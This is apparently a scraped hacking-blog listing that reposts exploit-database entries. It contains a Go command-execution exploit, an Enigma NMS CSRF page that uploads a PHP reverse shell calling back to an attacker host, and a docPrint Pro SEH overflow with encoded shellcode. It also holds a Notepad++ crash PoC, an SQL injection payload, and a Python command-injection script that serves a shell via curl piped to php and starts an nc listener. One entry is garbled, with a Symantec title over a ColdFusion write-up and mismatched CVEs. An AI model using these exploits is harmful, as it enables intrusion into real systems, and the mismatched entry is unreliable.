fmt.Println("Exploit failed!") } else { fmt.Println("Usage: ./exploit -u http://127.0.0.1 -p 8181 -cmd 'id;'") } } func exploit() (string, string) { tbTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}} client := &http.Client{Transport: tbTransport} datas, err := url.ParseQuery(cmd) req, err := http.NewRequest("POST", target+":"+port+"/u/jsp/designer/script_test.jsp", strings.NewReader(datas.Encode())) req.Header.Set("Content-type", "application/x-www-form-urlencoded") resp, err := client.Do(req) if err != nil { panic(err) } defer resp.Body.Close() body, _ := ioutil.ReadAll(resp.Body) return resp.Status, string(body) }
  20. HireHackking

    Enigma NMS 65.0.0 - Cross-Site Request Forgery

    HireHackking posted a blog entry in Hacker Technology
    #--------------------------------------------------------------------# # Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) # # Date: 21 July 2019 # # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage: https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # # Version: Enigma NMS 65.0.0 # # CVE-IDs: CVE-2019-16068 # # Full write-up: https://www.mogozobo.com/?p=3647 # #--------------------------------------------------------------------# _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma CSRF by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application. <html> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495"); xhr.withCredentials = true; var body = "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"action\"\r\n" + "\r\n" + "system_upgrade\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"action_aux\"\r\n" + "\r\n" + "upload_file_complete\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + "Content-Type: application/x-php\r\n" + "\r\n" + "\x3c?php\n" + "\n" + "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + "\n" + "?\x3e\n" + "\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"upfile_name\"\r\n" + "\r\n" + "evil.php\r\n" + "-----------------------------208051173310446317141640314495--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } submitRequest(); window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser'; </script> <body onload="submitRequest();" > </body> </html>
  21. HireHackking

    docPrint Pro 8.0 - SEH Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    import struct # Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow # Date: September 14th, 2019 # Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io) # Vendor Homepage: http://www.verypdf.com # Software Link: http://dl.verypdf.net/docprint_pro_setup.exe # Version: 8.0 # Tested on: Windows 10 and Windows 7 # TO RUN: # 1. Create a blank file named "test.pdf" # 2. Open doc2pdf_win.exe # 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File" # 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay" # 5. Click "Add File(s)" # 6. Select the "test.pdf" file created from step 1. # 7. Press on "Start" and name the file "exploit.pdf" # Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII) # Zero out registers for calculations. zero = "\x25\x01\x01\x01\x01" zero += "\x25\x10\x10\x10\x10" # Stack alignment alignment = "\x54" # push esp alignment += "\x58" # pop eax alignment += "\x2d\x1a\x50\x55\x55" # sub eax, 0x1a505555 alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555 alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555 alignment += "\x50" # push eax alignment += "\x5c" # pop esp # Custom created and encoded MessageBox POC shellcode. # Utilized aplication DLL with no ASLR for Windows API call to MessageBox function. # \x31\xc0\x50\x68 # \x42\x41\x4a\x41 # \x89\xe1\x50\x68 # \x42\x41\x4a\x41 # \x89\xe2\x50\x50 # \x51\x52\x50\xbe # \x38\x20\x00\x10 # \xff\xe6\x41\x41 # 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!) shellcode = zero # zero out eax shellcode += "\x2d\x55\x15\x4f\x53" # sub eax, 0x534f1555 shellcode += "\x2d\x55\x02\x4f\x53" # sub eax, 0x534f0255 shellcode += "\x2d\x57\x01\x50\x53" # sub eax, 0x53500157 shellcode += "\x50" # push eax # 4F554A42 4F554A42 51554B44 shellcode += zero # zero out eax shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42 shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42 shellcode += "\x2d\x44\x4b\x55\x51" # sub eax, 0x51554b44 shellcode += "\x50" # push eax # 153A393A 153A393A 173B3B3B shellcode += zero shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x173b3b3b shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a shellcode += "\x2d\x3b\x3b\x3b\x17" # sub eax, 0x173b3b3b shellcode += "\x50" # push eax # 3A3A1927 3A3A0227 3B3B0229 shellcode += zero # zero out eax shellcode += "\x2d\x27\x19\x3a\x3a" # sub eax, 0x3a3a1927 shellcode += "\x2d\x27\x02\x3a\x3a" # sub eax, 0x3a3a0227 shellcode += "\x2d\x29\x02\x3b\x3b" # sub eax, 0x3b3b0229 shellcode += "\x50" # push eax # 3F3C3F3F 3F3C3F3F 403D4040 shellcode += zero # zero out eax shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040 shellcode += "\x50" # push eax # 323A1A27 323A0227 333B0229 shellcode += zero # zero out eax shellcode += "\x2d\x27\x1a\x3a\x32" # sub eax, 0x323a1a27 shellcode += "\x2d\x27\x02\x3a\x32" # sub eax, 0x323a0227 shellcode += "\x2d\x29\x02\x3b\x33" # sub eax, 0x333b0229 shellcode += "\x50" # push eax # 3F3C3F3F 3F3C3F3F 403D4040 shellcode += zero # zero out eax shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040 shellcode += "\x50" # push eax # 323A1545 323A1545 333B1545 shellcode += zero # zero out eax shellcode += "\x2d\x45\x15\x3a\x32" # sub eax, 0x323a1545 shellcode += "\x2d\x45\x15\x3A\x32" # sub eax, 0x323a1545 shellcode += "\x2d\x45\x15\x3b\x33" # sub eax, 0x333b1545 shellcode += "\x50" # push eax # Let's roll. payload = "\x41" * 1676 payload += "\x70\x06\x71\x06" # JO 6 bytes. If fails, JNO 6 bytes payload += struct.pack('<L', 0x10011874) # pop ebp pop ebx ret reg.dll payload += "\x41" * 2 # Padding to reach alignment payload += alignment payload += shellcode payload += "\x45" * (6000-len(payload)) # Write to file f = open('bajablast.txt', 'w') f.write(payload) f.close()
  22. HireHackking

    Notepad++ < 7.7 (x64) - Denial of Service

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Notepad++ all x64 versions before 7.7. Remote memory corruption via .ml file. # Google Dork: N/A # Date: 2019-09-14 # Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) # Vendor Homepage: https://notepad-plus-plus.org/ # Version: < 7.7 # Tested on: Windows x64 # CVE : CVE-2019-16294 # Description: SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file. Open aaaaa.ml via affected notepad++ POC files: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47393.zip Result: (230.c64): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Notepad++\SciLexer.dll - rax=00007ff8e64014c0 rbx=00000000000aaaaa rcx=00000000000aaaaa rdx=0000000000000003 rsi=0000000000000000 rdi=00000000ffffffff rip=00007ff8e63c071d rsp=000000aa06463d60 rbp=000000aa06463e81 r8=0000000000002fc8 r9=0000000000000000 r10=000000000000fde9 r11=000000aa06463d90 r12=0000000000000000 r13=0000000000000000 r14=0000000000000001 r15=0000000000000002 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 SciLexer!Scintilla_DirectFunction+0x950dd: 00007ff8e63c071d 0fb70458 movzx eax,word ptr [rax+rbx*2] ds:00007ff8e6556a14=????
  23. HireHackking

    Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload

    HireHackking posted a blog entry in Hacker Technology
    ===========Security Intelligence============ # Vendor Homepage: adobe.com # Version: 2018 # Tested on: Adobe ColdFusion 2018 # Exploit Author: Pankaj Kumar Thakur (Nepal) ==========[Table of Contents]============== * Overview * Detailed description * Thanks & Acknowledgements * References ==========[Vulnerability Information]======== * Unrestricted file upload in Adobe ColdFusion 2018 * CWE-434 * Base Score: 6.8 MEDIUM * Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H =========[ Overview]========================= * System Affected: Adobe ColdFusion 2018 * Impact: Unrestricted file upload =====[ Detailed description]================= Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code. Request POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 Host: hostname:portno User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 Content-Type: multipart/form-data; Content-Length: 303 Connection: close Upgrade-Insecure-Requests: 1 . . -----------------------------24464570528145 Content-Disposition: form-data; name="file"; filename="shell_file with extension" Content-Type: image/jpeg shell code -----------------------------24464570528145 Content-Disposition: form-data; name="path" . . After uploading shell, its located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension =====[ Thanks & Acknowledgements]======================================== * Acknowledged by Adobe * Duplicate * https://nvd.nist.gov/vuln/detail/CVE-2016-10258 * https://www.cvedetails.com/cve/CVE-2016-1713/ * https://www.openwall.com/lists/oss-security/2016/01/12/4 =====[ EOF ]===========================================================
  24. HireHackking

    Enigma NMS 65.0.0 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    #--------------------------------------------------------------------# # Exploit Title: Enigma NMS search_pattern SQL Injection # # Date: 21 July 2019 # # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage: https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # # Version: Enigma NMS 65.0.0 # # CVE-IDs: CVE-2019-16065 # # Full write-up: https://www.mogozobo.com/?p=3647 # #--------------------------------------------------------------------# _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma SQLi by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern= Vulnerable Parameter: search_pattern (GET) Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='
  25. HireHackking

    Enigma NMS 65.0.0 - OS Command Injection

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python #--------------------------------------------------------------------# # Exploit Title: Enigma NMS OS Command Injection # # NETSAS Pty Ltd Enigma NMS # # Date: 21 July 2019 # # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage: https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # # Version: Enigma NMS 65.0.0 # # CVE-IDs: CVE-2019-16072 # # Full write-up: https://www.mogozobo.com/?p=3647 # #--------------------------------------------------------------------# import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading os.system('clear') print("""\ _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma NMS Reverse Shell by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus """) enigma_host = raw_input("Enter Enigma NMS IP address:\t") attack_host = raw_input("Enter Attacker IP address:\t") rev_sh_port = raw_input("Enter reverse shell port:\t") web_svr_port = raw_input("Enter web server port:\t\t") user = raw_input("Enter Username:\t\t\t") os.system("stty -echo") password = raw_input("Enter Password (no echo):\t") os.system("stty echo") enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1" enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"} print "\n\n[+] Building PHP reverse shell" f=open("evil.php","w") f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n") f.close() # Create simple webserver hosting evil php file print "[+] Hosting PHP reverse shell" web_svr_port = str(web_svr_port) web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid) # Create netcat listener print "[+] Creating listener on port " + rev_sh_port subprocess.Popen(["nc", "-nvlp", rev_sh_port]) # Send payload to Enigma NMS print "[+] Sending payload\n" try: r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password)) except: pass print "\n[+] Cleaning up mess..." # Shut down http server os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)